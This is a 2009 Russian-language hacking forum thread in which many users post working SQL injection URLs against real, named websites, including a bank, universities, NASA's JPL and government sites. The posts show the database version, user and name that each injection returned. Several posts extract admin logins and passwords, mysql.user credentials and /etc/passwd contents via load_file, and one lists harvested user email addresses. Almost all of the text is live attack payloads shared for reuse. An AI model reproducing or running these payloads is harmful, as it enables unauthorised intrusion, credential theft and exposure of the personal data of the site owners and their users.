Просмотр полной версии : SQL Инъекции
HAXTA4OK
23.06.2009, 22:44
http://tripuraproperty.com.np/index.php?page=detailinformation&id=-1+UnIoN+SelECT+1,2,CoNcAT_ws(0x3a,version(),user() ,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19--
5.0.24-standard:tripurap@localhost:tripurap_tripura
HAXTA4OK
24.06.2009, 00:30
http://www.sewabank.com.np/photo_gallery.php?id=1'+and+substring(version(),1, 1)=5+--+
какой то там банк :)
http://classifieds.business-opportunities.biz/ads/638%20union%20select%201,2,3,version(),database(), 6,user(),8--/
5.0.45-debian_1ubuntu3.1-log:bizop@172.19.0.147:bizop
pelligrim
24.06.2009, 13:42
http://www.black-cat.ru/cat/articles.php?id=-57+union+select+concat_ws(0x3a,version(),database( ),user())--
5.0.41-log:blackcat:blackcat@cub.mplik.ru
http://a-kentaur.ru/index.php?id=-107+union+select+concat_ws(0x3a,version(),database (),user())--
4.1.22-standard:kent_kent:kent_kent@localhost
Skofield
24.06.2009, 14:51
PR 5
http://em.tsu.edu/calendar/index.php?display=event&id=-579+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19/*
5.0.45-community:calendar:printers@em.tsu.edu
http://em.tsu.edu/calendar/index.php?display=event&id=-579+union+select+1,load_file(0x2f6574632f706173737 764),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
не помню кидали или нет, антибоян не работает
http://www.sit-trans.com/?action=customer_view_profile&id=-1717'+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,concat_Ws(0 x2b,use r(),version(),database()),11,12,13,14,15,16,17,18, 19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 ,36+--+
u_sittrans@localhost
5.0.44
sittrans
http://www.faberlic-msk.ru/index.php?act=fbcatalog&s=into&id=-1+union+select+1,2,3,concat_ws(char(58),version(), database(),user())--
5.1.29
liona@localhost
DezMond™
25.06.2009, 00:43
http://www.insightrussia.org/menu.php?id=-7'+UnIoN+SeLecT+1,database(),3,4,5,version()+--+
insight::4.1.22-lk-log
http://synclub.ru/menu.php?t=text&id=-22+UnIoN+SeLecT+username+from+user+--+
admin
http://jerusalemstonenyc.com/states.php?id=-23+union+select+1,version(),3,4+--+
4.1.22-standard
http://www.haircommercial.co.uk/auction/home.php?a=-203+union+select+1,2,3,4,5,concat_ws(0x3a3a,user_n ame,user_password),7+from+users+--+&f=0
http://rockpubs.planetrock.co.uk/details.php?pub_id=-52'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, concat_ws(0x3a3a,id,admin_id,password)+from+rockpu b_admin+/*+
PS антибоян не пашет((, извеняюсь если будут баяны(
PR: 4
http://home.utk.ru/news.php?id=-100065+union+select+1,2,3,4,concat_ws(0x3a,version (),user(),database()),6,7,8,9,10,11
4.0.24-log:netutk@localhost:netutk
AlexSatter
25.06.2009, 13:22
http://www.foroporlamemoria.es/pl.php?id=-68+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6,7,8,9,10,11,12,13,14,15,16/*
5.0.32-Debian_7etch10-log:fmemoria_es@lqsym.nodo50.org:foroporlamemoria_ es
http://www.fashionmod.ru/pl.php?id=-52+union+select+1,2,concat_ws(0x2a,version(),user( ),database())
5.1.32-community-log*Dkfmxjh_fashion@91.195.124.11*Dkfmxjh_fashion
http://www.wspinanie.pl/biznes/product.pl.php?id=-11+union+selecT+1,2,3,4,5,6,7,8,9,10,concat_Ws(0x3 a,version(),user(),database()),12
5.0.51a-24+lenny1:wspinanie@localhost:wspinanie_1
http://www.wspinanie.pl/biznes/product.pl.php?id=-11+union+selecT+1,2,3,4,5,6,7,8,9,10,LOAD_FILE(0x2 f6574632f706173737764),12+from+mysql.user
http://www.wspinanie.pl/biznes/product.pl.php?id=-11+union+selecT+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3 a,user,password),12+from+mysql.user
http://www.turul.ro/forum/tt.php?id=-3+union+select+unhex(hex(version())),2,3/*
http://www.psyvlad.ru/pc/pp.php?id=-3+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3
5.0.51a-community:psyvlad@localhost:db_psyvlad
http://www.polymedix.com/pr.php?id=-42+union+select+1,2,3,4,5,concat_ws(0x3a,version() ,user(),database()),7,8,9,10
5.0.67-msl-icd1-log:polymcms@localhost:polymedi_sys
http://www.ddjgraphics.com/pr.php?id=-4+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4
5.0.45:root@localhost:ddj
http://www.ddjgraphics.com/pr.php?id=-4+union+select+1,LOAD_FILE(0x2f6574632f70617373776 4),3,4
http://www.clearbluebrandsolutions.com/pr.php?id=-15+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4,5,6
4.0.27-MAX-LOG:CLEARBLUE@208.109.138.41:CLEARBLUE
Skofield
25.06.2009, 16:36
http://www.elonat.com/buy_a_business_info.php?id=-59+union+select+1,2,3,4,5,concat_ws(0x3a,username, password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24+from+admin--
Database Version: 5.0.82-community
Database name: web29-elonat
User name: web29-elonat@localhost
jokester: посмотри на правила темы, они изменились , логины , пароли, хеши и админки запрещены
http://www.vip-zalevsky.com/index.php?pageid=-2+union+select+1,2,3,concat_ws(0x3a,version(),user (),database()),5,6,7,8,9,10,11,12,13,14,15,16--
4.1.22-standart-log
http://www.cvetnik.com.ua/product.php?id=-34+union+select+1,2,3,concat_ws(0x3a,database(),ve rsion(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38--
cvetnik_cvetnik:4.1.22-standard-log:cvetnik_cvetnik@localhost
И того же разработчика:
http://www.unimed.com.ua/index.php?pageid=-4+union+select+1,2,3,concat_ws(0x3a,database(),ver sion(),user()),5,6,7,8,9,10,11,12--
http://www.tsoklan.com/index.php?pageid=-340+union+select+1,2,3,concat_ws(0x3a,database(),v ersion(),user()),5,6,7,8,9,10,11,12--
http://www.uitb.com.ua/a-imglib/index.php?groupid=-8+union+select+concat_ws(0x3a,database(),version() ,user()),2,3,4,5,6--
http://www.maytravel.kiev.ua/index.php?pageid=-21+union+select+1,2,3,concat_ws(0x3a,database(),ve rsion(),user()),5,6,7,8,9,10,11,12--
http://www.ekomtech.kiev.ua/a-news/news.php?id=-12+union+select+1,2,3,concat_ws(0x3a,database(),ve rsion(),user()),5,6,7,8,9--
http://www.pres.com.ua/index.php?pageid=-5+union+select+1,2,3,concat_ws(0x3a,database(),ver sion(),user()),5,6,7,8,9,10,11,12--
http://www.mntext.com.ua/index.php?pageid=-4+union+select+1,2,3,concat_ws(0x3a,database(),ver sion(),user()),5,6,7,8,9,10,11,12--
http://www.fastflowerstoukraine.com/a-price/group.php?groupid=-10+union+select+1,concat_ws(0x3a,database(),versio n(),user()),3,4,5,6--
http://www.kyivflorist.com/a-price/group.php?groupid=-2+union+select+1,concat_ws(0x3a,database(),version (),user()),3,4,5,6--
http://juggler.artinact.com/a-news/news.php?id=-18+union+select+1,2,3,concat_ws(0x3a,database(),ve rsion(),user()),5,6,7,8--
http://cubetriu.artinact.com/index.php?pageid=3+union+select+1,2,concat_ws(0x3a ,database(),version(),user()),4,5,6,7,8,9,10,11,12--
http://cdp.com.ua/index.php?pageid=6+union+select+1,2,concat_ws(0x3a ,database(),version(),user()),4,5,6,7,8,9,10,11,12--
http://www.ukrmusic.com.ua/?mid=3&music_line_id=339+union+select+1,2,3,4,5,6,concat_ ws(0x3a,database(),version(),user()),8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33--
http://www.duna.kiev.ua/index.php?pageid=9+union+select+1,2,concat_ws(0x3a ,database(),version(),user()),4,5,6,7,8,9,10,11,12--
И vip-zalevsky.com от Bramin тож из той серии =)
HAXTA4OK
25.06.2009, 22:53
http://www.ashokshakya.com.np./sahitya/geetfull.php?id=-1+union+select+1,concat_ws(0x3a,user(),version(),d atabase()),3,4,5,6,7,8,9--
ashok_root@localhost:4.1.22-standard:ashok_drishtikon
#########################################
http://www.gundemturkiye.org/detail.php?subject=&news=&date=1&dateop==&day1=1&month1=1&year1=1994&day2=1&month2=1&year2=1990&np=&&id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),versi on(),database()),6,7,8--
gundemturkiye@localhost:5.0.32-Debian_7etch6-log:www_gundemturkiye_org
$########################################
http://www.imhotep-org.eu/include/edi.php?id=1&np=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4--
4.0.27-max-
log:dbo164644938@212.227.118.42:db164644938
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
http://lame.ws/rit/quote.php?id=-1+union+select+concat_ws(0x3a,version(),user(),dat abase()),2,3,4--
5.0.24a-log:root@localhost:quotes
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
что то про футбол как я понял
http://swissscore.com/ws/seite.php?id=1'+union+select+1,concat_ws(0x3a,user (),database(),version()),3,4,5,6,7,8/*
web365@localhost:usr_web365_2:4.1.22-standard
%%%%%%%%%%%%%%%%%%%%%%%%%%%
http://urola.pre.wegetit.ws/servicios-detalle.php?id=1+and+substring(version(),1,1)=5--
#####################################
http://www.contax.ws/inicio.php?id=1&s=4+and+substring(version(),1,1)=5--
AlexSatter
26.06.2009, 11:25
http://www.hrgrp.com/releases/pr.php?id=-19+union+select+1,2,3,4,5,concat_ws(0x3a,version() ,user(),database()),7,8,9,10,11
4.0.27-log:hrgrp@192.168.1.51:hrgrp
http://www.emag.ru/pr.php?pr=-10+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9,10
5.0.45:emag@localhost:emag
http://asu.iate.obninsk.ru/pr.php?id=-1+union+select+concat_ws(0x3a,version(),user(),dat abase())
5.0.45:asu@localhost:asudb
http://www.artsawa.com/site/pr.php?id=-3+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7
5.0.41-community-log:abouder_asawa@76.163.252.69:abouder_asawa
beerhack
26.06.2009, 17:31
http://www.drummusic.tv/product.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,USER NAME,PASSWORD,EMAIL),10,11,12,13,14,15+from+USERS/*
Database Version: 5.0.45-community
Database name: digivendor
User name: dmtv_public@localhost
M.W.N.N.
27.06.2009, 00:10
http://www.ce-sa.org/prod.php?id=6%27+union+select+1,2,concat_ws(0x3a,v ersion(),database(),user()),4,5,6,7,8,9,10/*
version():4.1.21-standard-log
database():cesaorg_cesa
user():cesaorg@localhost
beerhack
27.06.2009, 01:24
http://citynsk.tv/index.php?page=progr&id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4--
Database Version: 4.1.22-log
Database name: adeptor1_vizit
User name: adeptor1_vizit@localhost
HAXTA4OK
27.06.2009, 10:20
http://www.beatgoeson.se/help.php?id=-1+union+select+concat_ws(0x3a,version(),database() ,user()),2--
4.0.17-standard:f1000686:f1000686@localhost
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
http://www.heleneschmitz.se/php/loadmeny.php?id=1+and+substring(version(),1,1)=4--
AlexSatter
27.06.2009, 13:09
http://www.telephototech.ru/news_podr.php?nid=-187+union+select+1,2,3,4,5,6,concat_ws(0x3a,versio n(),user(),database()),8,9,10/*
5.0.26-log:telephotot@localhost:telephotot
http://www.sputnik-altai.ru/hot.php?id=52+union+select+1,2,3,4,5,6,concat_ws(0 x3a,version(),user(),database())
5.0.77:sputnik@localhost:sputnik
http://www.roma-mia.de/stadtspaziergang-rom.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7
4.1.22-standard-log:db242003_2@local2:db242003_2
DezMond™
27.06.2009, 19:56
http://arcadeboomer.com/index.php?loadpage=./includes/articleblock.php&articlecat=-2+union+select+1,group_concat(table_name),3,4,5,6, 7,8,9,10+from+information_schema.tables+--+
http://diveinredsea.ru/news.php?p=-11'+union+select+1,pass,3,4+from+admin+/*+
http://israelecotours.com/news.php?p=-4'+union+select+1,2,pass,4,login,6,7+from+admin+/*+&u=1
http://www.fysiovanlith.nl/index.php?pid=-36+union+select+1,2,3,4,database(),6,7,8,9,10,11,1 2+/*+&hid=1
mey_cms
http://www.4x4site.nl/nieuwsitem.php?artid=-350+union+select+1,2,3,version(),5,6,7,8+/*+&titel=Range%20Rover%20convertible
4.1.21-standard-log
http://www.spamash.by/menu.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9+/*+
5.0.45-Debian_1-log
http://www.cycling.by/news.php?form_id=-900+union+select+1,login,3,4,password,6,7+from+cms _system_users+/*+
HAXTA4OK
27.06.2009, 20:15
http://www.topp6.se/index.php?do=showrate&id=-1'+union+select+concat_ws(0x3a,version(),user(),da tabase()),2+--+
5.0.51a:topp6@193.138.217.37:topp6
Krist_ALL
27.06.2009, 22:59
http://eho-dv.com/news.details.php?id=-13168+Union+select+1,2,3,version(),5,6,7,8,9,10,11 ,12+
5.0.77-community
Skofield
28.06.2009, 01:42
http://ethicaltraveler.net/news_story.php?id=-181+union+select+1,version(),3,4/*
Database Version: 4.1.22-standard
Database name: imalawi_main
User name: imalawi_main%40localhost
M.W.N.N.
28.06.2009, 01:57
http://www.lonestar-sc.com/team_page.php?tid=506+Union+select+1,2,unhex(hex(c oncat_ws(0x3a,version(),database(),user()))),4,5,6 ,7,8,9,10,11,12,13,14,15,16,17+from+mysql.user+lim it+1,1/*
version():4.1.18
database():lonestar_sc
user():dlyckman@dlyckman.securesites.net
Есть табличка mysql.user
http://www.timbermarket.ro/detalii_oferta.php?id_oferta=-138+UNION+SELECT+1,2,concat_ws(0x3a,version(),data base(),user(),@@version_compile_os),4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18--
Database Version: 5.0.45
Database name: c2timbermarket
User name: c2timbermarket@localhost
Os : redhat-linux-gnu
Skofield
28.06.2009, 15:27
PR 6
http://universitatestiu.url.edu/programa.php?id=-47+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29--
5.0.75-0ubuntu10.2 : UE2009 : ue2009@localhost
http://universitatestiu.url.edu/programa.php?id=-47+union+select+1,2,concat_ws(0x3a,login,password) ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29+from+usuario--
beerhack
28.06.2009, 15:37
http://ludesign.curious.nl/icds2009/subpage.php?ID=-1+union+select+1,2,3,4,5,6,version(),8,9/*
Database Version: 4.1.20-log
Database name: icds2009
User name: icds2009@localhost
[PR 3]
http://www.satgo.com.tw/shop/shop.php?id=-202+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50, 51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67 ,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,8 4,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100 ,101,102,103,104,105,106,107,108,109,110,111,112,1 13,114,115,116,117,118,119,120,121,122,123
4.0.21-log:satgocomtw:satgo.com.tw@localhost
Skofield
28.06.2009, 17:45
http://www.sacredheartclonakilty.ie/programmes.php?id=-3+union+select+1,concat_ws(0x3a,username,password) ,3+from+administration/*&language=russian
Database Version: 5.0.41-community
Database name: pmcshane_sacred_heart
User name: pmcshane_admin@localhost
beerhack
29.06.2009, 03:58
http://www.cezar.ua/a-articles/article.php?id=1+union+select+1,2,concat_ws(0x3a,l ogin,password,email),4,5,6,7,8,9,10,11,12,13+from+ cezar.aadm_users--
Database Version: 5.0.51a-24+lenny1-log
Database name: cezar
User name: u_cezar@localhost
pelligrim
29.06.2009, 06:44
http://www.avtomarket.ks.ua/index.php?action=auto&type=new&id=-31+union+select+1,2,3,4,5,concat_ws(0x3a,version() ,database(),user()),7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28--
5.0.51a-log:avtomarket_auto:avtomarket_marke@s8
AlexSatter
29.06.2009, 11:25
http://www.photolife.com/por.php?id=-481+union+select+1,2,3,unhex(hex(concat_ws(0x3a,ve rsion(),user(),database()))),5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,3 0,31,32,33,34,35
4.1.7-standard:photolife@localhost:photolife
http://alkor.regioninfo.ru/news.php?id=-39+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9,10,11,12
5.0.45:alkorregi@localhost:alkorregi
http://www.altairest.ru/look_new.php?id=-18+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4
5.0.26-log:ayasuweb_rest@localhost:ayasuweb_rest
http://www.future-sense.co.za/pg.php?id=-2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conca t_ws(0x3a,version(),user(),database()),15,16,17
5.0.32-Debian_7etch10:futuresense@dedi49.jnb1.host-h.net:db_futuresense
http://www.calvaryefc.com/pages/pg.php?id=-76+union+select+1,2,3,4,5,6,concat_ws(0x3a,version (),user(),database()),8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22
4.0.27-standard-log:dbo162563135@74.208.16.88:db162563135
0nep@t0p
29.06.2009, 18:39
http://www.calvin.edu/kuyers/journal.php?ID=-26+union+select+1,2,3,4,5,group_concat(table_name+ separator+0x2f),7+from+information_schema.tables+w here+table_schema+not+in('information_schema')--+
version: 5.0.67
http://www.gbcnv.edu/magic/article.php?op=Print&sid=-11+union+select+uid,2,uname,pass,umode,6,7,8+from+ users--+
version: 4.0.18
[53x]Shadow
29.06.2009, 23:23
jpl.nasa.gov
version: 4.0.27
user: JPLSite@localhost
http://www.jpl.nasa.gov/news/profiles.cfm?profile=-11%22+union+select+1,2,3,4,5,null,7,8,9,0,1,2,3,4, 5,6,7,8,9,0,user_name,2,3,4,user_password,6,7,8,9, 0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4, 5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9, 0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+login+limit+0,1/*
pelligrim
30.06.2009, 13:33
http://efmf.ru/frame.v2.shtml?song-meng.v2.php?song_id=50+union+select+1,2,3,concat_w s(0x3a,version(),database(),user()),5,6--
4.0.27-log:efmf:efmf@v25.valuehost.ru
http://michael-bg.com/products.php?sex_id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10,11--
4.0.27-standard:michael_michael:michael@localhost
Assembler
30.06.2009, 14:52
http://www.bienvenueaparis.fr/flat.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,3 0,31,32,33,34,35,group_concat(table_name),37,38,39 ,40,41,42,43,44,45,46%20from%20information_schema. tables--
5 версия
Kimliksiz
30.06.2009, 17:49
http://www.demosgreatclone.com/youtubeclone/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,user(),version(),d atabase()),3,4,5,6,7,8,9,10,11,12,13,14,15--
Skofield
30.06.2009, 18:13
PR 4
http://cluster2.space.swri.edu/article.php?id=-1+union+select+1,2,version(),4,5,6,7,8/*
Database Version: 5.0.45
Database name: cluster2_management
User name: IDFSproc@localhost
Fata1ex
Прадолжу тваё дело.
http://www.depo.ba/page.php?id=2391+union+select+1,2,3,4,5,6+/*
Как мило. Я почему-то решил, что уж подобрать столбцы и вывести сможет любой ) Поэтому и нераскрученные... тем более недокрученных было всего 4 из 9 = ) Ну ладно
www.iddeea.gov.ba
http://www.iddeea.gov.ba/hr_vijesti.php?id=-191+union+select+1,concat(user(),0x3a,version()),3 ,4/*
root@80.65.66.99:5.0.45
Вывод из mysql.user есть ;)
[TABLES]
user
user_info
users
db
user:
User
Password
user_info:
Full_name
Email
users:
email
db:
db
user
Users.Email:
zagorkresevo@hotmail.com
strateski.razvoj@etikete-agens
nevzad_r@hotmail.com
...
Ctacok, жжошь :) Сам бы ни за что не догадался (:
http://ocenshik.mostpp.ru/news.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,%20user(),%2 0database(),%20version()),6,7,8+/*
root@zvm27.host.ru: ocenshik:4.0.27
http://www.donland.ru/news.asp?Id=1+or+1=(SELECT+TOP+1+TABLE_NAME%20+FRO M+INFORMATION_SCHEMA.TABLES)--
Плохо в MSSQL скулях так что не судите ;)
beerhack
30.06.2009, 22:41
PR 6
http://www.eohsi.rutgers.edu/facultystaff/view.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,con cat_ws(0x3a,user,password),49,50,51,52,53,54,55,56 ,57,58,59,60+from+mysql.user/*
Database Version: 4.0.12
Database name: eohsi
User name: root@localhost
/etc/passwd
http://www.eohsi.rutgers.edu/facultystaff/view.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,loa d_file(0x2F6574632F706173737764),49,50,51,52,53,54 ,55,56,57,58,59,60/*
M.W.N.N.
01.07.2009, 03:21
http://www.nwaacc.org/soccer/news.php?id=667%27+union+select+1,2,3,4,5,concat_w s(0x3a,version(),database(),user()),7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*
version():4.0.25
database():nwl-nwaacc
user():nwl-nwaacc@web06
HAXTA4OK
01.07.2009, 09:28
http://www.sovinservice.ru/aks_thomas.php?id=-23+union+select+concat_ws(0x3a,user(),database(),v ersion()),2,3,4,5,6--
sovin251@v45.valuehost.ru:sovin251:4.0.27-max-log
pelligrim
01.07.2009, 14:25
http://www.reproductionfabrics.com/shelf.php?ID=-3+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6--
5.0.45-log:mtconnect2:rfabrics@mercury.vcn.com
http://www.dala.com.ua/index.php?menu_id=-5+union+select+1,concat_ws(0x3a,version(),database (),user())--
5.0.45:dala_db:dala_1@localhost
PostgreSQL
albatros-film.com
[PR = 4]
http://www.albatros-film.com/list.phtml?genreid=27+and+1=cast((SELECT+version() ||chr(%20%2058)||current_user||chr(58)||current_da tabase())+as%20%20+int)--
version PostgreSQL 7.3.4 on i686-pc-linux-gnu, compiled by GCC 2.96
user postgres
database albatrosdb
30 колонок
http://www.albatros-film.com/list.phtml?genreid=27+union+select+1,2,3,4,5,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 ,26,27,28,29,30--
nfi.no
[PR = 6]
http://www.nfi.no/barnunge/filmstudieark/film.html?id=205+and+1=cast((SELECT+version()||chr (%20%2058)||current_user||chr(58)||current_databas e())+as%20%20+int)--
version PostgreSQL 7.3.4 on i386-unknown-freebsd4.3, compiled by GCC 2.95.3:
user wdnfi
database nfi2
http://ahta.ru/pages.php5?sym=products&show=prod&cid=-00000858+union+select+concat_ws(0x0b,user(),databa se(),version()),2
z73313_ahtasite@77.221.130.5
z73313_ahtasite
5.0.30-Debian_1-log
Таблицы:
http://ahta.ru/pages.php5?sym=products&show=prod&cid=-00000858+union+select+group_concat(table_name),2+f rom+information_schema.tables+group+by+table_schem a+limit+1,1
pages,user,brands,vac,news
Skofield
01.07.2009, 17:57
http://www.citadelhockey.com/archive/archive.php?id=-18+union+select+1,2,3,4,version(),6,7--
Database Version: 5.0.67-community
Database name: citadelh_roster09
User name: citadelh_coachsp@localhost
----------------------------------------------------------------------------------------------------------
http://www.ephnotes.org/index2.php?issue=-1204+union+select+1,2,3,4,5,version()/*
Database Version: 4.1.22-standard
Database name: alumsite_alumniatwilliams
User name: alumsite_ephcard@localhost
http://www.midlandairmuseum.co.uk/news.php?id=-16+union+select+1,2,3,4,version(),6,7
http://www.parkwood-holdings.co.uk/news.php?id=-43+union+select+1,2,group_concat(table_name),4,5,6 ,7,8,9,10+from+information_schema.tables
http://www.histonfc.co.uk/news.php?id=-205+union+select+1,2,3,4,5,6,7,8,version(),10,11
http://www.noise.co.uk/news.php?id=-10+union+select+1,version(),3
AlexSatter
01.07.2009, 23:49
http://www.kuzbass-edinros.ru/catalog/dela.php?id=-4+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4,5/*
5.0.32-Debian_7etch6-log:webadmin@localhost:edin
http://www.allstarsshop.ru/main.php?big=-94154+union+select+1,concat_ws(0x3a,version(),user (),database()),3,4,5,6,7,8,9,10,11,12,13,14,15
4.1.25:allstarsshop3@localhost:allstarsshop3
beerhack
02.07.2009, 12:10
PR 5
http://montserrat.edu/news/press-release-item.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10--
Database Version: 5.0.67-log
Database name: mcadb
User name: mcauser@vermouth.dreamhost.com
DezMond™
02.07.2009, 15:13
http://www.eilat4u.co.il/recommend.php?p=-3'+union+select+1,2,3,4,LOAD_FILE(0x2F7777772F6569 6C617434752F7777772F666F72756D2F696E6465782E706870 ),6,7+from+admin+/*+&u=1
http://israelecotours.com/news.php?p=-4'+union+select+1,2,pass,4,login,6,7+from+admin+/*+&u=1
http://www.redseasports.co.il/index.php?lang=3+union+select+1,unhex(hex(LOAD_FIL E(0x2F6574632F706173737764)))+from+mysql.user+/*+
http://www.zinccafe.com/menu.php?id=-1+union+select+1,2,3,4+from+adminmenus+--+
http://www.pribor.ru/main.php?show=news&id=-155+UnIon+SeLect+1,2,version(),4,5,6+/*+
4.0.22
http://www.deadsea-premier.ru/item.php?id=-40+UnIon+SeLect+1,2,3,4,version(),6,7,8,9,10,11,12 ,13,14,15+/*+
4.0.22
ЗЫ Извеняйте если будут баяны, антибаян неработает(
jokester: А гугл тоже не работает?
re: гугл молчит
M.W.N.N.
02.07.2009, 17:49
"# What is Gelato?
# The global technical community dedicated to advancing Linux® on the Intel® Itanium® platform through collaboration, education, and leadership."
http://www.gelato.org/about/news_view.php?id=55+union+select+concat_ws(0x3a,ve rsion(),database(),user()),2,3,4+limit+1,1/*
version():4.0.24_Debian-10-log
database():newGelato
user():gelato@localhost
___
Kimliksiz
02.07.2009, 18:13
http://palindouble.com/gcards/getnewsitem.php?newsid=1+union+select+1,2,concat(u sername,char(45),userpass),4,5+FROM+gc_cardusers--
M.W.N.N.
02.07.2009, 18:31
http://yarra.ics.uci.edu/umich2/getdoc1.php?rid=21595+union+select+unhex(hex(conca t_ws(0x3a,version(),database(),user()))),2,3,4,5+l imit+1,1/*
version():4.1.14-standard
database():umich
user():root@localhost
Есть таблица mysql.user
AkyHa_MaTaTa
03.07.2009, 05:05
Датинг : нужно зарегаться:
http://www.narazdva.ru/?do=userinfo&id=-234++union%0Aselect+1,2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,group_concat(concat_ws(0x3a,login,pass word)+SEPARATOR+'%3Cbr%3E'),19,20,21,22,23,24,25,2 6,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42, 43,44,45,46,47,48,49+from+veter142_narazdva.nrd_pa rtners
Шелл льеться очень инересно (по крайне мере мне так кажеться).
http://www.911love.ru/?page=news&itm=25+union+select+1,2,3,4,5,concat_ws(0x3a,login ,password),7,8,9,10+from+www911love_main.911love_a ccess--+
---
http://www.vervefleet.com/quote.php?offer=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,data base(),version(),user()),10,11,12,13,14,15--
http://www.animeviews.com/quote.php?ID=-15+union+select+1,2,3,concat_ws(0x3a,database(),ve rsion(),user()),5--
http://www.qcsgopc.org/quote.php?ID=-15+union+select+1,2,3,concat_ws(0x3a,database(),ve rsion(),user()),5--
http://www.globalonlinecars.com/kuruma/quote.php?ID=-15+union+select+1,concat_ws(0x3a,database(),versio n(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19--
http://www.burocinternational.com/quote.php?id=-15+union+select+1,concat_ws(0x3a,database(),versio n(),user()),3,4,5,6,7--
http://www.bestanecs.ru/quote.php?golos=minus&id=-15+union+select+1,2,3,concat_ws(0x3a,database(),ve rsion(),user()),5--
http://www.webblogme.com/forum/quote.php?id=-15+union+select+1,concat_ws(0x3a,database(),versio n(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36--
http://www.sofore.com/work.php?id=-1+union+select+1,concat_ws(0x3a,database(),version (),user()),3,4,5,6,7,8,9,10,11,12,13--
http://www.goncharova.info/work.php?id=-1+union+select+1,2,concat_ws(0x3a,database(),versi on(),user()),4,5,6,7--
http://tm.perm.ru/work.php?id=1'+UNION+SELECT+1,2,3,4,concat_ws(0x3a ,database(),version(),user()),6/*
http://www.vysotnik.com.ua/work.php?id=1&fid=-6+union+select+concat_ws(0x3a,database(),version() ,user())--
http://www.hawkeng.com/work.php?id=-1+union+select+1,2,3,concat_ws(0x3a,database(),ver sion(),user()),5,6,7,8,9,10,11--
http://joohye-choi.com/portfolio/work.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,da tabase(),version(),user()),11,12,13,14,15,16,17,18 ,19,20,21--
http://www.jcinteractive.net/greencraft/viewvideo.php?cat_id=2&video_id=-3+union+select+1,2,concat_ws(0x3a,database(),versi on(),user()),4,5,6,7,8,9,10,11,12,13,14--
